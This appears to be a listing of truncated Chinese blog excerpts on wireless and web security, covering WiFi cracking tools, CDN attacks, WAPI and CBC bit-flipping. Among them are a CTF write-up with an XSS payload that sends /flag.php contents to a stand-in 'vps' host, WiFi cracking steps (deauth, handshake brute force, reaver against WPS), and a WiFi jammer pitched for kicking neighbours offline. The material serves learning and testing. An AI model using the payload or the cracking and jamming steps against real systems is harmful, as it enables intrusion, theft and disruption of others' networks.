从事信息安全相关工作5年了,虽然主要工作是安全产品售前.安全服务等方向,但既然选择了安全,想必都是有点黑客情节的,因此也前前后后杂七杂八的学了点东西.最近在研究无线(主要是WIFI)安全,相关书籍看了几本.网上文章也读过几篇,基本上都是告诉我们怎么破解WEP.WPA等,怎么伪造AP,怎么钓鱼等等,感觉挺杂乱的.当我们面对一个无线系统或者一个WEB系统,我们究竟应该从哪些方面去攻击呢,换言之——攻击思路是什么? 记得刚毕业进入安全行业时,经常会碰到信息系统安全三要素CIA(完整性.保密性.可用性)…

无 线网络的攻与防一直是比较热门的话题,由于无线信号可以被一定范围内的任何人接收到(包括死黑阔),这样就给WIFI带来了安全隐患:路由器生产厂商和网 络服务供应商(ISPs)的配置大多是默认开启了WPS,这种环境下,无线网络往往是安全渗透测试里边的重要突破口.而使用以下这10个Wifi攻击工 具,我们就可以测试自己的无线网络潜在的安全问题了. 1. Aircrack-ng Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,Aircrack-ng套件包含的工具可用于捕获数据包.握手…

1.self-xss+302跳转构造csrf的利用: 1.login.php 存在跳转2.http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html 通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章c.html是<img src=1 onerror=document.location=//vps+escape($.ajax({url: '/flag.php', async: 0}).respon…

https://www.wandianshenme.com/play/esp8266-nodemcu-create-portable-wifi-jammer/ 使用 ESP8266 制作 WiFi 干扰器 - 无需密码即可使用任何 WiFi   嘿,朋友,我是 Kedar,你有没有想阻止所有的 WiFi信号?或者只是想从 WiFi 踢某人或邻居 WiFi .那么,本玩法是你等待结束的时刻了.这是为你提供的.仅需 $8 的 DIY Wifi 干扰器. 这个干扰器是如此微小,你可以放在口袋里,并随身…

你们家用的无线路由器安全吗?有人蹭网吗?无线路由器的漏洞在哪里?这么避免蹭网? 想要了解这些,必须要了解加密以及破解原理. 工具/原料 电脑 足够多足够好的wifi信号源 usb无线网卡(非必需) 一点点耐心 基础知识 1 普通无线加密及破解的分类: 1.wep加密:此类加密比较老旧,非常不安全,十分容易被破解,现在的无线路由器已经抛弃了此类加密方式. 2.PWA/WPA2 PSK加密.这类加密按道理来说是很安全的,但是由于很多路由器为了方便用户上网,设置了QSS快速连接功能(或者叫WPS功能)…

首先,为了对CDN进行攻击,我们必须清楚CDN的工作原理,这里我们再来简单介绍一下CDN的工作模型. CDN的全称是Content Delivery Network(内容分发网络),通过在网络各处的加速节点服务器来为网站抵挡恶意流量,把正常流量进行转发.用简单点的话来说,CDN一般有三个作用 1. 跨运营商加速:我们自己的网站常常只属于一个运营商(比如:电信),而加速节点遍布每家运营商,于是和网站不同运营商(比如:联通)的用户访问起来就不会那么慢了. 2. 缓存加速:很多的静态资源以及一部分页面…

WIFI和WAPI的区别 既然WIFI和WAPI都是WLAN的传输协议,那么两者究竟都有怎样的区别? 首先第一点区别在于,两者的缔造者不一样.WIFI是又国外制定的一个协议,而WAPI是由中国制定的,这一点上比较类似于目前移动所支持TD-SCDMA制式3G网络一样,只不过WAPI和TD-SCDMA相比,WAPI原没有TD在国际上的认可程度高. 第二点区别是两者最本质的不同,就是WIFI和WAPI在加密的算法上不一样,使用过无线路由器和网卡的朋友都知道,无线路由器和网卡都有很多的加密形式,这样的加…

一.得到wifi密码   系统:Kali Linux   工具:Aircrack-ng,EWSA   方法:   1.WEP加密:deauth攻击:得到足够报文直接破解.   2.WPA加密:deauth攻击:得到握手包:转到windows平台,用EWSA+字典暴力破解.   3.WPS方式:reaver直接破解.   二.得到路由器管理地址   工具:Scanport   1.查看网关地址.   2.如果默认端口不可用,用Scanport进行端口扫描,得到可用端口.   三.得到路由器管理用户…

大家好,我是痞子衡,是正经搞技术的痞子.今天痞子衡给大家介绍的是常见短距离无线通信协议. 短距离无线通信是物联网的基础,随着物联网IoT的火热发展,各种短距离无线通信协议也是层出不穷,这些协议标准各有优缺以及应用场合.各种协议并存的现象将长期存在,没有人能够解决无线短距离互联标准不统一的问题,因为行业发展太快而标准跟不上,短期内还看不到一统江湖的短距离无线标准.今天痞子衡就用一张表为大家搜罗常见的短距离无线标准协议. 短距离无线通信协议列表 协议名 版本 推出时间 无线标准 电磁波频段(Hz)…

个人简介:渣渣一枚,萌新一个,会划水,会喊六六今天在bugku遇到关于CBC翻转攻击的题目,总结了一下关于CBC翻转攻击的原理,以及关于这道题目的解题思路个人博客:https://www.cnblogs.com/lxz-1263030049/ CBC翻转攻击的主要目的:通过损坏密文字节来改变明文字节.(注:借助CBC内部的模式) 通过添加单引号等恶意字符来绕过过滤器,或通过将用户ID更改为admin来提升权限,或者更改应用程序所需的明文的任何其他后果. 加密过程: 上图CBC加密原理图1:Pla…